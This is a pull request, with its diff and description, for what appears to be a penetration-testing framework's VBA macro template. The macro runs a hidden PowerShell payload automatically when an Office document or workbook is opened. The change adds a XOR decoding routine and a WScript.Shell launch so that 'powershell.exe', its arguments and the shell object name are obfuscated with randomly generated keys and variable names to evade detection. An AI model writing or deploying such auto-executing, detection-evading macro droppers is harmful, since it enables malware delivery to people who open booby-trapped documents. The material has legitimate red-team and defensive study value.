### PR TITLE
Add additional obfuscation to powershell_vba

### DIFF
--- a/data/templates/scripts/to_powershell.vba.template
+++ b/data/templates/scripts/to_powershell.vba.template
@@ -1,7 +1,8 @@
 Sub %{sub_auto_open}()
   Dim %{var_powershell}
   %{var_powershell} = %{powershell}
-  Call Shell(%{var_powershell}, vbHide)
+  Dim %{var_shell} : Set %{var_shell} = CreateObject(%{function_xor}(%{xor_wscript_shell},"%{xor_key}"))
+  %{var_shell}.Run %{function_xor}(%{xor_data},"%{xor_key}") & " " & %{var_powershell}, 0, False
 End Sub
 Sub AutoOpen()
   %{sub_auto_open}
@@ -10,3 +11,12 @@ Sub Workbook_Open()
   %{sub_auto_open}
 End Sub
 
+Private Function %{function_xor}(ByVal %{var_data} As String, ByVal %{var_key} As String) As String
+ Dim %{var_i} As Integer: Dim %{var_j} As Integer: Dim %{var_place} As String
+ %{var_i} = Len(%{var_key}$)
+ For %{var_j}  = 1 To Len(%{var_data})
+   %{var_place} = Asc(Mid$(%{var_key}$, (%{var_j}  Mod %{var_i}) - %{var_i} * ((%{var_j}  Mod %{var_i}) = 0), 1))
+   Mid$(%{var_data}, %{var_j} , 1) = Chr$(Asc(Mid$(%{var_data}, %{var_j} , 1)) Xor %{var_place})
+ Next
+ %{function_xor} = %{var_data}
+End Function


### PR DESCRIPTION
This commit adds an additional function in VBA which XORs the input
string with a provided key, which is also provided as a string. The
key used in the XOR process is a randomly generated string created upon
each generation of the payload. The additional pieces which are obfuscated
are powershell.exe along with the arguments passed to it but does not
include the actual payload.

Additionally, rather than use the call to Shell directly I modified the
VBA code to create a WScript.Shell object and then call the Run method on
that and pass the powershell command to run. The WScript.Shell string is
also obfuscated with the XOR function.

All of the added variables as well as function are also generated
randomly upon payload creation.
